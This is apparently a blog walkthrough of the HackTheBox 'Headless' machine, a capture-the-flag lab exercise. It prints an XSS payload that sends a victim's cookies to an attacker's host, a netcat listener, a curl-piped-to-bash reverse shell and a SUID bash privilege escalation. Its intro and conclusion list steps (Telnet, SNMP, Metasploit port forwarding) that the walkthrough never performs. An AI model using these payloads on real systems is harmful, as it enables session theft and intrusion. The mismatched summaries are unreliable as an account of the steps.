Introduction
In this Post, Let’s See how to CTF Headless from hackthebox and if you have any doubts, comment down below 👇🏾
Hacking Phases in Headless
Getting into the system initially.Checking open TCP ports using Nmap.Retrieving information from Telnet banners.Looking for vulnerabilities to exploit.Enumerating information through SNMP.Gaining access to a user shell.Obtaining the user flag.Escalating privileges.Using Metasploit for port forwarding.Identifying ways to escalate privileges.Exploiting vulnerabilities like file read to gain access.Obtaining the root flag.
Let’s Begin
Let’s Hack Headless HTB 😌
Enumeration
Direct https://app.hackthebox.com/machines/Headless
Name: Headless
Difficulty: Easy
User points: +20
Root points: +25
OS: Linux
Hi everyone, I want to share a walkthrough of this machine of the Season 4, one of the latest, its based on linux and with an easy dificulty. Here we can find a Cross Site Scripting (XSS) vulnerability that we have to exploit in the way to get an administrator cookie to access to a restricted page and then establish a conection with our machine.
User’s Flag:
Lets start with the same of all.
nmap 10.129.131.95 -A -p- -T4
There we find two special ports: 22-ssh and 5000-upnp. So lets visit our ip address with this port and lets see what happen.
Lets try to find additional directories on the way to get more information.
dirsearch -u <http://10.129.131.95:5000>
If we visit the dashboard we are unable to access, but in the supports page there is our oportunity to exploit it and get access to the machine.
Lets try the next payload:
<img src=x onerror=fetch('http://<YourIP>/?c='+document.cookie);>
And what happen if we submit it?
We successful discovered that its vulnerable to Cross Site Scripting (XSS), now we have to use Burpsuite to send our payload, and with a server open on python in the way to catch the response try to access to the dashboard page
BurpSuite:
we have to modify this package adding our payload at the ending separating it with “;” and in our User-Agent field.
I suggest to send it to repeater (Ctrl+R) and send many times because at the first instance its hard to get it.
Server:
Just start a simple http server with python in the port 80, I suggest to use python, we could do it with php, but I got a better response with python.
python3 -m http.server 80
After a few minutes we got it!
Finally here’s the admin cookie:
Cookie: ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0
Now after getting the admins cookie, we are able to visit the dashboard, change the cookie and we got this page
Now we have to stablish a connection with our machine. So, lets start a connection with netcat
nc -lvnp 9000
If we intercept the packet and try directly to stablish a connection with our machine we don’t have a right answer
But, what happen if we curl our machine and execute it with bash?
curl http://<YourIP>/shell.sh|bash
If we look to our nc server…
We are into!
Root’s Flag:
Lets see what we are able to
If we cat the file and analyse it, we can find that its manipulating a file name “initdb.sh”
Okay, we can create the file changing the permitions of bash with our users bit, and then run syscheck
Finely run bash
/bin/bash -p
Cat the /root/root.txt and that’s all
Conclusion
This device offered an enjoyable and educational journey, during which we explored a range of topics such as TCP port scanning, service enumeration, UDP port scanning, SNMP enumeration, exploiting password disclosure vulnerabilities, port forwarding using Metasploit, manual port forwarding, file transfer, understanding file permissions, and exploiting file read vulnerabilities to retrieve the root.txt file through two distinct methods.
FAQs
- What is HacktheBox?
- HacktheBox is an online platform that offers a range of virtual machines for users to practice their penetration testing skills in a legal and controlled environment.
- What is “Headless” on HacktheBox?
- “Headless” refers to one of the machines available on HacktheBox, presenting users with various cybersecurity challenges to overcome.
- How do you obtain the user flag?
- Obtaining the user flag involves exploring the compromised system to locate the designated file containing the flag. This often requires executing commands and navigating through directories.
- What is privilege escalation?
- Privilege escalation is the process of gaining higher levels of access on a system than initially granted. It involves exploiting vulnerabilities or misconfigurations to elevate privileges.
- How do you escalate privileges in a hack?
- Privilege escalation can be achieved by exploiting vulnerabilities such as misconfigured services, weak file permissions, or known software vulnerabilities.